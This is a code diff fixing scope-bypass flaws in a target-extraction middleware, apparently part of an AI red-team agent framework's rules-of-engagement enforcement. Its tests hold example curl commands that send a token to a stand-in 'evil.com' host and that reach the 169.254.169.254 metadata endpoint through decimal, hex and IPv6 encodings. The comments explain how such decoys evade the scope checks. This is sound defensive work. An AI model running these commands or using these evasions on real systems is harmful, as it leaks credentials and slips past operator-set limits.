diff --git a/packages/decepticon/decepticon/middleware/_command_targets.py b/packages/decepticon/decepticon/middleware/_command_targets.py
index 973c5137..ba45e25b 100644
--- a/packages/decepticon/decepticon/middleware/_command_targets.py
+++ b/packages/decepticon/decepticon/middleware/_command_targets.py
@@ -30,10 +30,23 @@
 import re
 import shlex
 from collections.abc import Callable
+from urllib.parse import urlsplit
 
 _IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
 _CIDR_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}/\d{1,2}\b")
-_URL_RE = re.compile(r"\b(?:https?|ftp|file|smb|nfs|ssh|rdp|ldaps?)://([^\s/:]+)", re.IGNORECASE)
+# Capture the whole authority (up to the path/query/fragment/whitespace), NOT
+# just the leading ``[^\s/:]+`` slice. The old slice stopped at the first ``:``
+# and never crossed ``@``, so ``scheme://in-scope@evil.com/`` yielded the
+# in-scope userinfo (or nothing) instead of the real connect host ``evil.com``
+# — a scope-enforcement bypass. ``_host_from_authority`` then RFC-3986-splits
+# off userinfo + port and de-brackets IPv6 literals.
+_URL_AUTHORITY_RE = re.compile(
+    r"\b(?:https?|ftp|file|smb|nfs|ssh|rdp|ldaps?)://([^\s/\\?#]+)", re.IGNORECASE
+)
+# Threshold above which a bare decimal host is treated as a packed IPv4 integer
+# (e.g. ``http://2852039166/`` == 169.254.169.254) rather than a port/number.
+# 2**24 keeps small integers (ports, counts) from being mangled into IPs.
+_PACKED_IPV4_MIN = 1 << 24
 _HOSTNAME_AFTER_VERB_RE = re.compile(
     r"\b(?:curl|wget|httpx|nmap|masscan|rustscan|ssh|scp|sftp|rsync|"
     r"smbclient|smbmap|crackmapexec|nxc|netexec|nikto|sqlmap|hydra|ffuf|"
@@ -47,10 +60,15 @@
 )
 
 
-# Final labels that mark a token as a local file argument, never a network
-# target. No public DNS TLD collides with any of these, so excluding them is
-# safe and prevents RoE ENFORCE mode from refusing legitimate commands whose
-# option values (``-i key.pem``, ``-oA scan.txt``) look hostname-shaped.
+# Final labels that mark a token as a local-file argument, never a network
+# target, so RoE ENFORCE mode does not refuse legitimate commands whose option
+# values (``-i key.pem``, ``-oA scan.txt``) look hostname-shaped.
+#
+# SECURITY: an entry here is only safe if it is NOT also a delegated DNS TLD.
+# Real TLDs (``.sh`` ``.md`` ``.py`` ``.pl`` ``.pub`` ``.zip`` …) were removed:
+# leaving them in silently dropped genuine hosts such as ``evil.zip`` from RoE
+# scope enforcement. Over-extracting a spurious target (operator-overridable)
+# is safer than dropping a real one.
 _NON_TARGET_EXTENSIONS: frozenset[str] = frozenset(
     {
         "pem",
@@ -61,7 +79,6 @@
         "der",
         "p12",
         "pfx",
-        "pub",
         "txt",
         "log",
         "json",
@@ -76,12 +93,8 @@
         "xml",
         "html",
         "htm",
-        "md",
         "rst",
-        "sh",
-        "py",
         "rb",
-        "pl",
         "ps1",
         "bat",
         "pcap",
@@ -95,7 +108,6 @@
         "sqlite",
         "sqlite3",
         "gz",
-        "zip",
         "tar",
         "tgz",
         "7z",
@@ -131,19 +143,76 @@ def _is_valid_target(token: str) -> bool:
     return True
 
 
+def _canon_host(token: str) -> str:
+    """Canonicalize a host token so scope matching is encoding-independent.
+
+    De-brackets IPv6 literals, normalizes packed integer/hex IPv4 encodings to
+    dotted-quad, and compresses valid IP literals to their canonical string.
+    Hostnames pass through lower-cased. This closes the IMDS/forbidden-dest
+    bypass where ``http://2852039166/`` or ``http://0xa9fea9fe/`` reach
+    169.254.169.254 without matching a dotted-quad deny rule.
+    """
+    raw = token.strip()
+    bare = raw[1:-1] if raw.startswith("[") and raw.endswith("]") else raw
+    if not bare:
+        return raw.lower()
+    if ":" not in bare and "." not in bare:
+        try:
+            as_int = int(bare, 16) if bare.lower().startswith("0x") else int(bare)
+        except ValueError:
+            return bare.lower()
+        if bare.lower().startswith("0x") or as_int >= _PACKED_IPV4_MIN:
+            try:
+                # IPv4Address, not ip_address(): integers >= 2**32 must stay
+                # hostnames instead of being reinterpreted as IPv6 literals.
+                return str(ipaddress.IPv4Address(as_int))
+            except ValueError:
+                return bare.lower()
+        return bare.lower()
+    try:
+        return str(ipaddress.ip_address(bare))
+    except ValueError:
+        return bare.lower()
+
+
+def _host_from_authority(authority: str) -> str | None:
+    """Return the real connect host from a URL authority, RFC-3986-correctly.
+
+    Drops userinfo (everything through the last ``@``) and the port, and
+    de-brackets IPv6 literals — so an ``in-scope@evil.com`` decoy can't mask
+    the true host. Returns None when no host is present.
+    """
+    try:
+        host = urlsplit("//" + authority).hostname
+    except ValueError:
+        return None
+    return host or None
+
+
 def _extract_generic(command: str) -> set[str]:
     found: set[str] = set()
     found.update(_IP_RE.findall(command))
     for cidr in _CIDR_RE.findall(command):
         found.add(cidr)
-    for host in _URL_RE.findall(command):
-        found.add(host)
+    for authority in _URL_AUTHORITY_RE.findall(command):
+        host = _host_from_authority(authority)
+        if host:
+            found.add(host)
     for m in _HOSTNAME_AFTER_VERB_RE.finditer(command):
         candidate = m.group(1).rstrip(":,;\"'").lstrip("@")
-        if candidate.startswith("http"):
+        if candidate.lower().partition(":")[0] in ("http", "https"):
+            # Skip only scheme remnants and full URLs (the URL regex already
+            # handled those); a bare ``startswith("http")`` test also dropped
+            # real hosts such as ``httpbin.org`` from scope enforcement.
             continue
-        found.add(candidate)
-    return {t for t in found if _is_valid_target(t)}
+        if ":" in candidate and not _looks_ipv6(candidate):
+            # A compound option value (e.g. ``--resolve host:port:ip``) is
+            # captured as one token; split on ``:`` so each piece is validated
+            # independently instead of emitting a junk ``host:port:ip`` target.
+            found.update(candidate.split(":"))
+        else:
+            found.add(candidate)
+    return {c for t in found if (c := _canon_host(t)) and _is_valid_target(c)}
 
 
 def _extract_nmap_targets(command: str) -> set[str]:
diff --git a/packages/decepticon/tests/unit/middleware/test_command_targets_scope_bypass.py b/packages/decepticon/tests/unit/middleware/test_command_targets_scope_bypass.py
new file mode 100644
index 00000000..aff70ddb
--- /dev/null
+++ b/packages/decepticon/tests/unit/middleware/test_command_targets_scope_bypass.py
@@ -0,0 +1,78 @@
+from decepticon.middleware._command_targets import extract_targets
+
+
+def test_userinfo_decoy_yields_real_host_not_in_scope_label():
+    targets = extract_targets("curl http://in-scope.acme.com@evil.com/")
+    assert targets == {"evil.com"}
+
+
+def test_userinfo_with_password_decoy_yields_real_host():
+    targets = extract_targets("curl https://api.acme.com:tok@evil.com/exfil")
+    assert targets == {"evil.com"}
+
+
+def test_decimal_encoded_imds_normalized_to_dotted_quad():
+    targets = extract_targets("curl http://2852039166/latest/meta-data/")
+    assert "169.254.169.254" in targets
+
+
+def test_hex_encoded_imds_normalized_to_dotted_quad():
+    targets = extract_targets("curl http://0xa9fea9fe/latest/meta-data/")
+    assert "169.254.169.254" in targets
+
+
+def test_ipv6_literal_url_host_extracted():
+    targets = extract_targets("curl http://[fd00:ec2::254]/latest/meta-data/")
+    assert "fd00:ec2::254" in targets
+
+
+def test_compound_resolve_argument_does_not_emit_junk_token():
+    targets = extract_targets(
+        "curl --resolve metadata.google.internal:80:169.254.169.254 "
+        "http://metadata.google.internal/"
+    )
+    assert "169.254.169.254" in targets
+    assert "metadata.google.internal" in targets
+    assert "metadata.google.internal:80:169.254.169.254" not in targets
+
+
+def test_small_integer_host_not_mangled_into_ip():
+    assert "0.0.31.144" not in extract_targets("curl http://8080/")
+
+
+def test_integer_above_ipv4_range_not_mangled_into_ipv6():
+    assert "::1:0:0" not in extract_targets("curl http://4294967296/")
+
+
+def test_plain_url_host_unchanged_regression():
+    assert extract_targets("curl http://prod.acme.com/path") == {"prod.acme.com"}
+
+
+def test_url_with_port_strips_port_regression():
+    assert extract_targets("curl https://prod.acme.com:8443/") == {"prod.acme.com"}
+
+
+def test_plain_ipv4_target_still_extracted_regression():
+    assert "10.0.0.5" in extract_targets("nmap -sV 10.0.0.5")
+
+
+def test_cidr_target_preserved_regression():
+    assert "10.0.0.0/24" in extract_targets("nmap -sn 10.0.0.0/24")
+
+
+def test_tld_colliding_hosts_not_dropped_by_extension_denylist():
+    assert extract_targets("curl https://evil.zip/") == {"evil.zip"}
+    assert extract_targets("curl https://target.sh/") == {"target.sh"}
+    assert extract_targets("curl https://pay.md/") == {"pay.md"}
+    assert extract_targets("curl https://exploit.py/") == {"exploit.py"}
+    assert extract_targets("curl https://domain.pl/") == {"domain.pl"}
+    assert extract_targets("curl https://docs.pub/") == {"docs.pub"}
+
+
+def test_genuine_local_file_argument_still_excluded():
+    assert extract_targets("nmap -oA key.pem 10.0.0.1") == {"10.0.0.1"}
+    assert extract_targets("nmap -oA scan.txt 10.0.0.1") == {"10.0.0.1"}
+
+
+def test_host_starting_with_http_not_dropped():
+    assert "httpbin.org" in extract_targets("curl httpbin.org")